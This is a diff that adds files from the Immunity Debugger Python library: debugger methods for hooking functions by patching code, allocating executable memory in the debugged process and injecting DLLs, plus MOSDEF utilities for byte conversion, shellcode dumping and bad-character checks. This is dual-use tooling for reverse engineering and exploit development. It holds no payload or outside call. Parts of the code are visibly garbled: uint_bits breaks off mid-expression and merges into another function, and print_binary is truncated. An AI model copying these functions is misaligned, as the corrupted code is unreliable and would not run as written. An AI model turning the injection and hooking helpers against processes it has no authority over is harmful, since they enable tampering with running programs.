+ patch_code = self.Assemble( "JMP 0x%08x" % ptr, address = hookAddress)
+
+ while idx < len(patch_code):
+ op = self.Disasm( hookAddress + idx )
+ if op.isCall() or op.isJmp():
+ op = None
+ break
+
+ idx += op.getOpSize()
+ if not op:
+ continue
+
+
+ ex_prelude = self.readMemory( hookAddress, idx )
+
+ code = self._createCodeforHook( memAddress, hookAddress + idx,\
+ fn_ndx + 1, entry, ex_prelude, alloc_size)
+
+ self.writeMemory( ptr , code )
+ ptr+= len(code)
+ self.writeMemory( hookAddress, patch_code )
+
+ fn_restore.append( ex_prelude ) # Correspond in index with function address
+
+ if ptr % 4:
+ ptr = 4 + ptr & ~(4-1)
+ hook.setMem( ptr )
+ self.writeLong( memAddress, ptr )
+
+ hook.setRestore( fn_restore )
+
+
+
+ ### Remote Allocation/Deallocation ###
+
+ def rVirtualAlloc(self, lpAddress, dwSize, flAllocationType, flProtect):
+ """
+ Virtual Allocation on the Debugged Process
+
+ @type lpAddress: DWORD
+ @param lpAddress: Desired starting Address
+
+ @type dwSize: DWORD
+ @param dwSize: Size of the memory to be allocated (in bytes)
+
+ @type flAllocationType: DWORD
+ @param flAllocationType: Type of Memory Allocation (MEM_COMMIT, MEM_RESERVED, MEM_RESET, etc)
+
+ @type flProtect: DWORD
+ @param flProtect: Flag protection of the memory allocated
+
+ @rtype: DWORD
+ @return: Address of the memory allocated
+ """
+ return debugger.pVirtualAllocEx( lpAddress, dwSize, flAllocationType, flProtect )
+
+ # default dwFreetype == MEM_RELEASE
+ def rVirtualFree(self, lpAddress, dwSize = 0x0, dwFreeType = 0x8000):
+ """
+ Virtual Free of memory on the Debugged Process
+
+ @type size: DWORD
+ @param size: (Optional, Def: 0) Size of the memory to free
+
+ @type dwFreeType: DWORD
+ @param dwFreeType: (Optional, Def: MEM_RELEASE) Type of Free operation
+
+ @rtype: DWORD
+ @return: On Successful, returns a non zero value
+ """
+ return debugger.pVirtualFreeEx( lpAddress, dwSize, dwFreeType )
+
+ def remoteVirtualAlloc(self, size = 0x10000, interactive = True):
+ """
+ Virtual Allocation on the Debugged Process
+
+ @type size: DWORD
+ @param size: (Optional, Def: 0x10000) Size of the memory to allocated, in bytes
+
+ @rtype: DWORD
+ @return: Address of the memory allocated
+ """
+
+ return self.rVirtualAlloc( 0x0, size, 0x1000, 0x40)
+
+ ### OS information ###
+ def getOsVersion(self):
+ return self.osversion
+
+ def getOsRelease(self):
+ return self.osrelease
+
+ def getOsInformation(self):
+ """
+ Get OS information
+
+ @rtype: TUPLE
+ @return: List with ( system, release, version)
+ """
+ import platform
+ return (platform.system(),platform.release(),platform.version())
+
+ def getThreadId(self):
+ """
+ Return current debuggee thread id
+
+ @trype: LONG
+ @return: Thread ID
+ """
+ return debugger.GetThreadId()
+
+
+ ### Accessing Recognition Routines ###
+
+ def searchFunctionByName(self, name, heuristic = 90, module = None, version = None, data=""):
+ """
+ Look up into our dictionaries to find a function match.
+
+ @type name: STRING
+ @param name: Name of the function to search
+
+ @type module: STRING
+ @param module: name of a module to restrict the search
+
+ @type version: STRING
+ @param version: restrict the search to the given version
+
+ @type heuristic: INTEGER
+ @param heuristic: heuristic threasold to consider a real function match
+
+ @type data: STRING|LIST
+ @param data: Name (or list of names) of the .dat file inside the Data folder, where're stored the function
+ patterns. Use an empty string to use all the files in the Data folder.
+
+ @rtype: DWORD|None
+ @return: the address of the function or None if we can't find it
+ """
+ recon = FunctionRecognition(self, data)
+ return recon.searchFunctionByName(name, heuristic , module, version )
+
+ def searchFunctionByHeuristic(self, csvline, heuristic = 90, module = None, data=""):
+ """
+ Search memory to find a function that fullfit the options.
+
+ @type csvline: STRING
+ @param csvline: A line of a Data CSV file. This's a simple support for copy 'n paste from a CSV file.
+
+ @type heuristic: INTEGER
+ @param heuristic: heuristic threasold to consider a real function match
+
+ @type module: STRING
+ @param module: name of a module to restrict the search
+
+ @type data: STRING|LIST
+ @param data: Name (or list of names) of the .dat file inside the Data folder, where're stored the function
+ patterns. Use an empty string to use all the files in the Data folder.
+
+ @rtype: DWORD|None
+ @return: the address of the function or None if we can't find it
+ """
+
+ recon = FunctionRecognition(self, data)
+ return recon.searchFunctionByHeuristic(csvline, heuristic , module )
+
+ def resolvFunctionByAddress(self, address, heuristic=90,data=""):
+ """
+ Look up into our dictionaries to find a function match.
+
+ @type address: DWORD
+ @param address: Address of the function to search
+
+ @type heuristic: INTEGER
+ @param heuristic: heuristic threasold to consider a real function match
+
+ @type data: STRING|LIST
+ @param data: Name (or list of names) of the .dat file inside the Data folder, where're stored the function
+ patterns. Use an empty string to use all the files in the Data folder.
+
+ @rtype: STRING
+ @return: a STRING with the function's real name or the given address if there's no match
+ """
+ recon = FunctionRecognition(self,data)
+ return recon.resolvFunctionByAddress(address, heuristic,data)
+
+ def makeFunctionHashHeuristic(self, address, compressed = False, followCalls = True, data=""):
+ """
+ @type address: DWORD
+ @param address: address of the function to hash
+
+ @type compressed: Boolean
+ @param compressed: return a compressed base64 representation or the raw data
+
+ @type followCalls: Boolean
+ @param followCalls: follow the first call in a single basic block function
+
+ @type data: STRING|LIST
+ @param data: Name (or list of names) of the .dat file inside the Data folder, where're stored the function
+ patterns. Use an empty string to use all the files in the Data folder.
+
+ @rtype: LIST
+ @return: the first element is described below and the second is the result of this same function but over the first
+ call of a single basic block function (if applies), each element is like this:
+ a base64 representation of the compressed version of each bb hash:
+ [4 bytes BB(i) start][4 bytes BB(i) 1st edge][4 bytes BB(i) 2nd edge]
+ 0 <= i < BB count
+ or the same but like a LIST with raw data.
+ """
+ recon = FunctionRecognition(self, data)
+ return FunctionRecognition.makeFunctionHashHeuristic(address, compressed, followCalls)
+
+ def makeFunctionHashExact(self, address,data=""):
+ """
+ Return a SHA-1 hash of the function, taking the raw bytes as data.
+
+ @type address: DWORD
+ @param address: address of the function to hash
+
+ @type data: STRING|LIST
+ @param data: Name (or list of names) of the .dat file inside the Data folder, where're stored the function
+ patterns. Use an empty string to use all the files in the Data folder.
+
+ @rtype: STRING
+ @return: SHA-1 hash of the function
+ """
+
+ recon = FunctionRecognition(self,data)
+ return recon.makeFunctionHashExact(address)
+
+ def makeFunctionHash(self, address, compressed = False,data=""):
+ """
+ Return a list with the best BB to use for a search and the heuristic hash
+ of the function. This two components are the function hash.
+
+ @type address: DWORD
+ @param address: address of the function to hash
+
+ @type compressed: Boolean
+ @param compressed: return a compressed base64 representation or the raw data
+
+ @type data: STRING|LIST
+ @param data: Name (or list of names) of the .dat file inside the Data folder, where're stored the function
+ patterns. Use an empty string to use all the files in the Data folder.
+
+ @rtype: LIST
+ @return: 1st element is the generalized instructions to use with searchCommand
+ 2nd element is the heuristic function hash (makeFunctionHashHeuristic)
+ 3rd element is an exact hash of the function (makeFunctionHashExact)
+ """
+ recon = FunctionRecognition(self,data)
+ return recon.makeFunctionHash(address, compressed)
+
+
+ ### Accessing Control Flow Analysis Routines ###
+
+ def findLoops(self, address):
+ """
+ This function finds Natural Loops inside a function.
+
+ Each loop item has the following structure:
+ [ start, end, nodes ]
+ start: address of node receiving the back edge.
+ end: address of node which has the back edge.
+ node: list of node's addresses involved in this loop.
+
+ @type address: DWORD
+ @param address: function start address
+
+ @rtype: LIST
+ @return: A list of loops
+ """
+
+ cfa = ControlFlowAnalysis(self, address)
+ return cfa.findNaturalLoops()
+
+
+ def sleep_till_stopped(self, timeout):
+ """
+ timeout is in seconds. this function will sleep 1 second at a time until timeout is reached
+ or the debugger has stopped (probably due to AV)
+ returns True if we were stopped before timeout happened
+ """
+ for i in xrange(timeout):
+ #sleep 1 second at a time
+ if self.isStopped():
+ return True
+ if self.isEvent():
+ return True
+
+ time.sleep(1)
+ return False
+
+
+ def inject_dll( self, dll_path ):
+ """
+ This function loads a DLL into the debugged process.
+
+ @type dll_path: STRING
+ @param dll_path: The full path to the DLL. ie C:\\WINDOWS\\system32\\kernel32.dll
+
+ @rtype: DWORD
+ @return: The thread ID of the DLL loading thread.
+ """
+
+ return debugger.InjectDll( dll_path )
+
+
+
+
+
+
+
+
diff --git a/1.73/Libs/immutils.py b/1.73/Libs/immutils.py
new file mode 100755
index 0000000..626c7d3
--- /dev/null
+++ b/1.73/Libs/immutils.py
@@ -0,0 +1,982 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+
+MOSDEF utils for non-CANVAS users
+
+"""
+
+
+__VERSION__ = '1.0'
+
+# TODO check:
+# -----------
+# cparse: dInt
+# spark: prettyprint
+# x86opcodes: issignedbyte, intel_byte, intel_2byte
+# pelib: hexdump
+# mosdef: isprint, strisprint
+# makeexe: binstring?
+
+import sys, os
+sys.path.append('.')
+
+#try:
+# from internal import *
+#except:
+def __ignore(*args, **kargs):
+ return False
+def __retsamearg(arg):
+ return arg
+devlog = __ignore
+isdebug = __ignore
+warnings_safely_ignore = __ignore
+warning_restore = __ignore
+deprecate = __ignore
+uniqlist = __retsamearg
+
+
+# --------------------
+#
+# __MOSDEFimport__
+#
+# --------------------
+#
+# global options: (set it to False to desactivate)
+_MOSDEFimport_hook = True # desactivate the current hook
+_MOSDEFimport_cachefailedimport = True # cache can be dangerous (breaks reload()?)
+#
+# normally you DONT want to hack in the tag.
+# NOTE: can we optimize speed here?
+#
+# begin
+from traceback import format_exc
+def __MOSDEFimport__(*args):
+ global _failed_imported_module_table
+ def mod_hash(modname):
+ return hash(str(hash(str(sys.path))) + modname)
+ modname = args[0]
+ if __debug__:
+ if len(args) < 4 or args[3] == None:
+ devlog('MOSDEFimport', "IMPORT %s" % modname)
+ else:
+ if len(args[3]) == 1:
+ val = args[3][0]
+ else:
+ val = str(args[3])[1:-1]
+ devlog('MOSDEFimport', "FROM %s IMPORT %s" % (modname, val), nofile = True)
+ if _MOSDEFimport_cachefailedimport:
+ modhash = mod_hash(modname)
+ if modhash in _failed_imported_module_table:
+ devlog('MOSDEFimport', "already failed to import <%s>" % modname, nofile = True)
+ raise ImportError
+ cwd = os.getcwd()
+ filepath = os.path.dirname(globals()['__file__'])
+ mosdefpath = filepath.replace(cwd, ".")
+ #print "[!] mosdef cwd: %s"%cwd
+ #print "[!] filepath: %s"%filepath
+ #print "[!] mosdefpath: %s"%mosdefpath
+ sys.path = uniqlist(sys.path)
+ if cwd != mosdefpath and mosdefpath not in sys.path:
+ sys.path.insert(0, mosdefpath)
+ import_time = time.time()
+ try:
+ return sys.modules['__builtin__'].__import__orig(*args)
+ except:
+ if _MOSDEFimport_cachefailedimport:
+ _failed_imported_module_table += [modhash]
+ devlog('all', "failed to import <%s> (lost %ss)" % (modname, time.time() - import_time), nofile = True)
+ devlog('ImportError', format_exc(0).split('\n')[1], nodesc = True)
+ if isdebug('ImportErrorTrace'):
+ backtrace()
+ raise
+import __builtin__
+if _MOSDEFimport_hook and not hasattr(__builtin__, '__import__orig'):
+ import time
+ __builtin__.__import__orig = __builtin__.__import__
+ __builtin__.__import__ = __MOSDEFimport__
+ _MOSDEFimport_hook = False
+ _failed_imported_module_table = []
+ devlog('all', "__import__ hooked with __MOSDEFimport__")
+del __builtin__
+# end
+
+
+#####################################################
+#
+#
+# dictionary class that hold floats as integers
+#
+#
+#####################################################
+
+import types
+
+class antifloatdict(types.DictType):
+
+ def __init__(self, arg = {}):
+ if type(arg) == types.DictType:
+ d = {}
+ for item in arg.items():
+ d.__setitem__(item[0], item[1])
+ arg = d
+ return types.DictType.__init__(self, arg)
+
+ def __setitem__(self, itemname, itemvalue):
+ if type(itemvalue) == types.FloatType:
+ itemvalue = int(itemvalue)
+ return types.DictType.__setitem__(self, itemname, itemvalue)
+
+ def __getitem__(self, itemname):
+ item = types.DictType.__getitem__(self, itemname)
+ if type(item) == types.FloatType:
+ item = int(item)
+ return item
+
+ def copy(self):
+ return antifloatdict(self)
+
+def hasbadchar(word,badchars):
+ try:
+ wordstr=intel_order(word)
+ except:
+ wordstr=str(word)
+ for ch in badchars:
+ if wordstr.count(ch):
+ return 1
+ return 0
+
+
+
+#####################################################
+#
+#
+# little/big endian management functions
+#
+#
+#####################################################
+
+def check_bits_consistancy(bits):
+ assert not bits % 8, "bits should be sizeof(char) aligned, got %d" % bits
+
+def check_string_len(s, l, assertmsg=""):
+ if assertmsg != "":
+ assertmsg += "\n"
+ assert len(s) >= l, "%sexpecting a at_least_%d_chars string, got %d_chars instead.\nstring is: %s" % \
+ (assertmsg, l, len(s), prettyprint(s))
+
+def split_int_bits(bits, i):
+ check_bits_consistancy(bits)
+ # we cast to uint_bits here to be sure to return (bits/8) x uint8
+ u = uint_bits(bits, i)
+ r = []
+ for b in range(0, bits, 8):
+ r += [ (u >> (bits - (b + 8))) & 0xff ]
+ return r
+
+# 0x12345678 -> [0x12, 0x34, 0x56, 0x78]
+def split_int32(int32):
+ return split_int_bits(32, int32)
+
+def int2list_bits(bits, i, swap=0):
+ check_bits_consistancy(bits)
+ l = split_int_bits(bits, i)
+ #devlog("int2list: l = %s" % l)
+ lc = []
+ for n in l:
+ #devlog("int2list: n = 0x%x" % n)
+ lc += [chr(n)]
+ if swap:
+ lc.reverse()
+ return lc
+
+def int2list32(int32, swap=0):
+ return int2list_bits(32, int32, swap=swap)
+
+#def int2list(int32):
+# deprecate("use int2list32 instead")
+# return int2list32(int32)
+
+def int2str_bits(bits, i, swap=0):
+ check_bits_consistancy(bits)
+ return "".join(int2list_bits(bits, i, swap=swap))
+
+def int2str32(int32, swap=0):
+ return int2str_bits(32, int32, swap=swap)
+
+def int2str16(int16, swap=0):
+ return int2str_bits(16, int16, swap=swap)
+
+def int2str32_swapped(int32):
+ return int2str_bits(32, int32, swap=1)
+
+def int2str16_swapped(int16):
+ return int2str_bits(16, int16, swap=1)
+
+#def int2str(int32):
+# deprecate("use int2str32 instead")
+# return int2str32(int32)
+
+def str2int_bits(bits, s):
+ check_bits_consistancy(bits)
+ assert type(s) == type(""), "str2int_bits() expects a string argument, got %s" % type(s)
+ nchars = bits / 8
+ check_string_len(s, nchars, "str2int_bits(%d, s): string=<%s> len=%d" % (bits, s, len(s)))
+ r = 0
+ warnings_safely_ignore(FutureWarning)
+ for i in range(0, nchars):
+ #print "%d = %x << %d" % (ord(s[i]) << 8*i, ord(s[i]), 8*i)
+ r += ord(s[nchars-i-1]) << 8*i
+ warning_restore()
+ return r
+
+def str2int_bits_swapped(bits, s):
+ check_string_len(s, bits/8)
+ return byteswap_bits(bits, str2int_bits(bits, s))
+
+def str2int16(s):
+ return str2int_bits(16, s)
+
+def str2int32(s):
+ return str2int_bits(32, s)
+
+def str2int64(s):
+ return str2int_bits(64, s)
+
+def str2int16_swapped(s):
+ return str2int_bits_swapped(16, s)
+
+def str2int32_swapped(s):
+ return str2int_bits_swapped(32, s)
+
+def str2int64_swapped(s):
+ return str2int_bits_swapped(64, s)
+
+# "\x12\x34\x56\x78" -> 0x12345678
+#def str2int32_old(s):
+# #return str2int_bits(32, s)
+# assert type(s) == type(""), "str2int32() expects a string argument, got %s" % type(s)
+# if len(s) < 4:
+# devlog("str2int32: string=<%s> len=%d" % (s, len(s)))
+# raise AssertionError, "str2int32 called with a less_than_4_chars string (%d chars)" % len(s)
+# (a,b,c,d)=(ord(s[0]),ord(s[1]),ord(s[2]),ord(s[3]))
+# return sint32((a << 24) + (b << 16) + (c << 8) + d)
+
+#returns the integer that the 4 byte string represents
+#Note: If you are getting OverflowError in this function, you need to upgrade to Python
+#2.2. !!
+
+def str2bigendian(astring):
+ """
+ oppposite of istr2int
+ """
+ return str2int32(astring)
+
+# >>> print "0x%x" % str2littleendian("\x12\x34\x56\x78")
+# 0x78563412
+def str2littleendian(astring):
+ return byteswap_32(str2int32(astring))
+
+def byteswap_bits(bits, i):
+ check_bits_consistancy(bits)
+ r = 0
+ warnings_safely_ignore(FutureWarning)
+ for b in range(0, bits, 8):
+ r += (((i >> b) & 0xff) << (bits - (b + 8)))
+ warning_restore()
+ return r
+
+def byteswap_64(int64):
+ return byteswap_bits(64, int64)
+
+def byteswap_32(int32):
+ return byteswap_bits(32, int32)
+
+def byteswap_16(int16):
+ return byteswap_bits(16, int16)
+
+"""
+istr2halfword(halfword2bstr(dInt(x))) == byteswap_16(x)
+"""
+
+#####################################################
+#
+#
+# print crap nicely
+#
+#
+#####################################################
+
+#wee little function for printing strings nicely
+def hexprint(s):
+ if not type(s) == type(""):
+ return "can not hexdump %s" % type(s)
+ tmp=""
+ for c in s:
+ tmp+="[0x%2.2x]"%ord(c)
+ return tmp
+
+goodchars=".()~!#$%^&*()-=_/\\:<>"
+#let's not mess up our tty
+def prettyprint(instring):
+ import string
+ if not type(instring) == type(""):
+ devlog("prettyprint got %s and not string" % type(instring))
+ instring = str(instring)
+ #return "can not prettyprint %s" % type(instring)
+ tmp=""
+ for ch in instring:
+ #if (ch.isalnum() or ch in goodchars) and ord(ch)<127:
+ if ch in string.printable and ch not in ["\x0c"]:
+ tmp+=ch
+ else:
+ value="%2.2x" % ord(ch)
+ tmp+="["+value+"]"
+
+ return tmp
+
+def c_array(data, desc = None):
+ if not type(data) == type(""):
+ devlog("c_array() got %s and not string" % type(data))
+ return "c_array() can not dump %s" % type(data)
+ if not len(data):
+ return "c_array() got void buffer"
+
+ ucharbuf = "unsigned char buf[] = \""
+ for uchar in data:
+ ucharbuf += "\\x%02x" % ord(uchar)
+ ucharbuf += "\"; // %d byte" % len(data)
+ if len(data) > 1:
+ ucharbuf += "s"
+ if desc:
+ ucharbuf += ", %s" % desc
+
+ return ucharbuf
+
+def shellcode_dump(sc, align=0, alignpad=" ", alignmax=16, mode=None):
+ import types
+ assert type(align) == type(0), "error in arguments, expecting an int for 'align'"
+ if not type(sc) in [types.StringType, types.BufferType]:
+ devlog("shellcode_dump() got %s and not string" % type(sc))
+ return type(sc)
+ if not len(sc):
+ return "void buffer"
+ if mode and mode.upper() == "RISC":
+ align=4
+ alignmax=4
+ if align:
+ alignmax *= align
+ buf = ""
+ i = 0
+ for c in sc:
+ buf += "%02x " % ord(c)
+ if align and (i % align) == (align - 1):
+ buf += alignpad
+ if alignmax and (i % alignmax) == (alignmax - 1):
+ buf += "\n"
+ i += 1
+ if buf[-1] == "\n":
+ buf = buf[:-1]
+ return buf
+
+def dummywrite(fd, data):
+ """
+ we just want to write some data on any fd, opened or closed.
+ """
+ import os
+ try:
+ os.write(fd, data)
+ except OSError, errargs:
+ import errno
+ if errargs.errno != errno.EBADF:
+ raise
+
+def warnmsg(msg):
+ sys.stderr.write("WARNING: %s\n" % msg)
+
+#####################################################
+#
+#
+# return a binary representation of an integer
+#
+#
+#####################################################
+
+def binary_string_bits(bits, i):
+ binstr = ""
+ for bit in range(0, bits):
+ if i & (long(1) << bit):
+ binstr = "1" + binstr
+ else:
+ binstr = "0" + binstr
+ return binstr
+
+def binary_string_int8(int8):
+ return binary_string_bits(8, int8)
+
+def binary_string_int16(int16):
+ return binary_string_bits(16, int16)
+
+def binary_string_int32(int32):
+ return binary_string_bits(32, int32)
+
+def binary_string_int64(int64):
+ return binary_string_bits(64, int64)
+
+def binary_string_char(c):
+ return binary_string_int8(c)
+
+def binary_string_short(s):
+ return binary_string_int16(s)
+
+def binary_string_int(i):
+ return binary_string_int32(i)
+
+#####################################################
+#
+#
+# how to handle python fucking integers
+#
+#
+#####################################################
+
+def dInt(sint):
+ """
+ Turns sint into an int, hopefully
+ python's int() doesn't handle negatives with base 0 well
+ """
+ if sint==None or type(sint) in [type( (1,1) ), type( [1]), type( {} ) ]:
+ devlog("Type ERROR: dInt(%s)!"%str(sint))
+ #should we call bugcheck here?
+ raise TypeError, "type %s for dInt(%s)" % (type(sint), str(sint))
+
+ s=str(sint)
+ if s[0:2]=="0x":
+ return long(s,0)
+ else:
+ #if you have long("5.0") it throws a horrible exception
+ #so we convert to float and then back to long to avoid this
+ return long(float(s))
+
+def binary_from_string(astr,bits=None):
+ """ returns [1,0,0,0,0,0,0,0] from "\x80"
+ """
+ if not bits:
+ #print "Setting bits to 8*length"
+ bits=len(astr)*8
+ ret=[]
+
+ for c in astr:
+ #for each character
+ mask=0x80
+ for i in range(0,8):
+ #for each bit in the character
+ if mask & ord(c):
+ bit=1
+ else:
+ bit=0
+ ret+=[bit]
+ if len(ret)==bits:
+ break
+ mask=mask >> 1
+ return ret
+
+def b(mystr):
+ mydict={"1":1,"0":0}
+ tmp=0
+ for c in mystr:
+ value=mydict[c]
+ tmp=(tmp<<1)+value
+ return tmp
+
+# Note: this is a 5m lame function
+def hexdump(buf):
+ tbl=[]
+ tmp=""
+ hex=""
+ i=0
+ for a in buf:
+ hex+="%02X "% ord(a)
+ i+=1
+ if ord(a) >=0x20 and ord(a) <0x7f:
+ tmp+=a
+ else:
+ tmp+="."
+ if i%16 == 0:
+ tbl.append((hex, tmp))
+ hex=""
+ tmp=""
+ tbl.append((hex, tmp))
+ return tbl
+
+def prettyhexprint(s,length=8):
+ """
+ A nicely displayed hexdump as a string
+ """
+ # we are expecting a string here
+ if not type(s) == type(""):
+ return "can not hexdump %s" % type(s)
+ tmp=[]
+ i=1
+ for c in s:
+ tmp+=["%2.2x "%ord(c)]
+ if i%length==0:
+ tmp+=["\n"]
+ i+=1
+ return "".join(tmp)
+
+# generic functions for integers
+
+def sint_is_signed(bits, c):
+ return uint_bits(bits, c) >> (bits - 1)
+
+def uint_bits(bits, c):
+ # WARNING i dunno if dInt is safe here
+ c=dInt(c)
+ # [Python < 2.4] FutureWarning: x<> b:
+ b += 1
+ return b
+
+# a.k.a. MACROS for integers
+
+def uint8(c):
+ return uint_bits(8, c)
+
+def uint16(c):
+ return uint_bits(16, c)
+
+def uint32(c):
+ return uint_bits(32, c)
+
+def uint64(c):
+ return uint_bits(64, c)
+
+def sint16(c):
+ return sint_bits(16, c)
+
+def sint32(c):
+ return sint_bits(32, c)
+
+def sint64(c):
+ return sint_bits(64, c)
+
+def uint8fmt(c):
+ return uintfmt_bits(8, c)
+
+def uint16fmt(c):
+ return uintfmt_bits(16, c)
+
+def uint32fmt(c):
+ return uintfmt_bits(32, c)
+
+def uint64fmt(c):
+ return uintfmt_bits(64, c)
+
+def sint16fmt(c):
+ return sintfmt_bits(16, c)
+
+def sint32fmt(c):
+ return sintfmt_bits(32, c)
+
+def sint64fmt(c):
+ return sintfmt_bits(64, c)
+
+def IsInt(str):
+ """
+ Checks for integer, hex or no
+ """
+ try:
+ num = int(str,0)
+ return 1
+ except ValueError:
+ return 0
+
+#####################################################
+#
+#
+# old functions [ now deprecated ]
+#
+#
+#####################################################
+
+#
+
+def signedshort(i):
+ deprecate("use sint16() instead")
+ return sint16(i)
+
+def big2int(big):
+ deprecate("use sint32() instead")
+ return sint32(big)
+
+def int2uns(small):
+ assert sys.version_info[0] >= 2 and (sys.version_info[0] == 2 and sys.version_info[1] >= 4), \
+ "\nyou tried to call int2uns() but your python %d.%d is too old to handle it correctly\n" \
+ "Python versions before 2.4 are fucked up with integers, rely on 2.4 only!" % \
+ (sys.version_info[0], sys.version_info[1])
+ deprecate("use uint32() instead")
+ return uint32(small)
+
+def istr2halfword(astring):
+ #deprecate("use str2int16_swapped() instead")
+ return str2int16_swapped(astring)
+
+def nstr2halfword(astring):
+ #deprecate("use str2int16() instead")
+ return str2int16(astring)
+
+#def intel_str2int_old(astring):
+# if len(astring) < 4:
+# devlog("intel_str2int: astring=<%s> len=%d" % (astring, len(astring)))
+# raise AssertionError, "intel_str2int called with a less_than_4_chars string"
+#
+# (a,b,c,d)=(ord(astring[0]),ord(astring[1]),ord(astring[2]),ord(astring[3]))
+# #print "%x:%x:%x:%x"%(a,b,c,d)
+# result=a
+# result=result+b*256
+# result=result+c*65536
+# result=result+d*16777216
+# #change 2 int type, if long
+# result=uint32(result)
+# return result
+#
+def intel_str2int(astring):
+ deprecate("use str2littleendian instead")
+ return str2littleendian(astring)
+
+#just a nice short wrapper
+def istr2int(astring):
+ #devlog("istr2int(%s)" % astring)
+ return str2littleendian(astring)
+
+#def halfword2istr(halfword):
+# data=""
+# a=halfword & 0xff
+# b=halfword/256 & 0xff
+# data+=chr(a)+chr(b)
+# return data
+#
+#def halfword2bstr(halfword):
+# data=""
+# a=halfword & 0xff
+# b=halfword/256 & 0xff
+# data+=chr(b)+chr(a)
+# return data
+#
+#def short2bigstr(short):
+# """
+# changes an int to a two byte big endian string
+# """
+# data=""
+# #short=uint16(short)
+# #print "short=%x /256=%x"%(short,short/256)
+# data+=chr(short / 256)
+# data+=chr(short & 0xff)
+# return data
+
+"""
+>>> print hexprint(halfword2bstr(0x1234))
+[0x12][0x34]
+>>> print hexprint(short2bigstr(0x1234))
+[0x12][0x34]
+>>> print hexprint("".join(int2list(uint16(0x1234))[2:4]))
+[0x12][0x34]
+
+>>> print hexprint(halfword2istr(0x1234))
+[0x34][0x12]
+>>> print hexprint("".join(int2list(byteswap_16(uint16(0x1234)))[2:4]))
+[0x34][0x12]
+
+>>> print uint16fmt(istr2halfword(halfword2bstr(dInt(0x1234))))
+0x3412
+>>> print uint16fmt(byteswap_16(0x1234))
+0x3412
+
+>>> print hexprint(halfword2bstr(0x1234))
+[0x12][0x34]
+>>> print hexprint(int2str_bits(16, 0x1234))
+[0x12][0x34]
+>>> print hexprint(halfword2bstr(0x12345678))
+[0x56][0x78]
+>>> print hexprint(int2str_bits(16, 0x12345678))
+[0x56][0x78]
+>>> print hexprint(int2str16(0x1234))
+[0x12][0x34]
+>>> print hexprint(int2str16(0x1234, swap=1))
+[0x34][0x12]
+>>> print hexprint(int2str16_swapped(0x1234))
+[0x34][0x12]
+"""
+
+def halfword2istr(halfword):
+ #deprecate("use int2str16_swapped instead")
+ return int2str16_swapped(halfword)
+
+def halfword2bstr(halfword):
+ #deprecate("use int2str16 instead")
+ return int2str16(halfword)
+
+def short2bigstr(short):
+ return halfword2bstr(short)
+
+def intel_short(halfword):
+ return halfword2istr(halfword)
+
+def big_short(short):
+ return short2bigstr(short)
+
+#def big_order_old(myint):
+# """
+# Opposite of str2bigendian
+# """
+# str=""
+# a=chr(myint % 256)
+# myint=myint >> 8
+# b=chr(myint % 256)
+# myint=myint >> 8
+# c=chr(myint % 256)
+# myint=myint >> 8
+# d=chr(myint % 256)
+#
+# str+="%c%c%c%c" % (d,c,b,a)
+# return str
+
+##int to intelordered string conversion
+#def intel_order_old(myint):
+# #struct.pack is non-intuitive for non-python programers, which is why I do this sort of thing.
+# #it's for people who wish they were using perl, imo.
+# str=""
+# a=chr(myint % 256)
+# myint=myint >> 8
+# b=chr(myint % 256)
+# myint=myint >> 8
+# c=chr(myint % 256)
+# myint=myint >> 8
+# d=chr(myint % 256)
+#
+# str+="%c%c%c%c" % (a,b,c,d)
+#
+# return str
+
+def big_order(int32):
+ """
+ Opposite of str2bigendian
+ """
+ #deprecated("use int2str32() instead")
+ return int2str32(int32)
+
+def intel_order(int32):
+ """
+ bijection of str2littleendian()
+ """
+ #deprecated("use int2str32_swapped() instead")
+ return int2str32_swapped(int32)
+
+#def binary_string_long(l):
+# return binary_string_int64(l)
+
+#def print_binary_old(myint):
+# tmp=""
+# for i in range(0,32):
+# if (long(1)< 0:
+ for a in range(0,32):
+ ret = str(num&0x1) + ret
+ num = num >> 1
+
+ return ret
+
+#
+
+#####################################################
+#
+#
+# test ...
+#
+#
+#####################################################
+
+if __name__=="__main__":
+
+ warnings_safely_ignore(FutureWarning)
+
+ def test(funcname):
+ print "testing %s() ..." % funcname
+
+ print "running tests..."
+
+ test("split_int32")
+ assert split_int32(0x12345678) == [0x12, 0x34, 0x56, 0x78]
+
+ test("str2int16")
+ assert str2int16('\x12\x34\x56') == 0x1234
+ assert nstr2halfword('\x12\x34\x56\x78') == 0x1234 #DEPRECATED
+
+ test("str2int16_swapped")
+ assert str2int16_swapped('\x12\x34') == 0x3412
+ assert istr2halfword('\x12\x34') == 0x3412 #DEPRECATED
+ assert str2int16_swapped('\x12\x34\x56\x78') == 0x3412
+
+ test("str2littleendian")
+ assert str2littleendian('\x12\x34\x56\x78') == 0x78563412
+ assert intel_str2int('\x12\x34\x56\x78') == 0x78563412 #DEPRECATED
+ assert istr2int('\x12\x34\x56\x78') == 0x78563412 #DEPRECATED
+
+ test("str2bigendian/str2int32")
+ assert str2int32('\x12\x34\x56\x78') == 0x12345678
+ assert str2bigendian('\x12\x34\x56\x78') == 0x12345678
+
+ test("int2str16")
+ assert int2str16(0x1234) == '\x12\x34'
+ assert halfword2bstr(0x1234) == '\x12\x34' #DEPRECATED
+ assert short2bigstr(0x1234) == '\x12\x34' #DEPRECATED
+ assert big_short(0x1234) == '\x12\x34' #DEPRECATED
+
+ test("int2str16_swapped")
+ assert int2str16_swapped(0x1234) == '\x34\x12'
+ assert halfword2istr(0x1234) == '\x34\x12' #DEPRECATED
+ assert intel_short(0x1234) == '\x34\x12' #DEPRECATED
+ assert intel_short(0x12345678) == '\x78\x56' #DEPRECATED
+
+ test("int2str32")
+ assert int2str32(0x12345678) == '\x12\x34\x56\x78'
+ assert big_order(0x12345678) == '\x12\x34\x56\x78' #DEPRECATED
+
+ test("int2str32_swapped")
+ assert int2str32_swapped(0x12345678) == '\x78\x56\x34\x12'
+ assert intel_order(0x12345678) == '\x78\x56\x34\x12' #DEPRECATED
+
+ test("binary_string_int")
+ assert print_binary(0x12345678) == '00010010001101000101011001111000'
+
+ test("binary_string_int")
+ assert binary_string_short(0x12345678) == '0101011001111000'
+
+ try:
+ assert int2uns(-1) == 0xffffffffL #DEPRECATED
+ except AssertionError:
+ print "[!] failed: int2uns(-1) == 0xffffffff"
+ assert sys.version_info[0] >= 2, "word, what an old Python you have :/"
+ if sys.version_info[0] == 2 and sys.version_info[1] < 4:
+ print "Python 2.3 integers are fucked up, rely on 2.4 only!"
+ print "your version can not handle int2uns() correctly"
+ pass
+ else:
+ raise
+
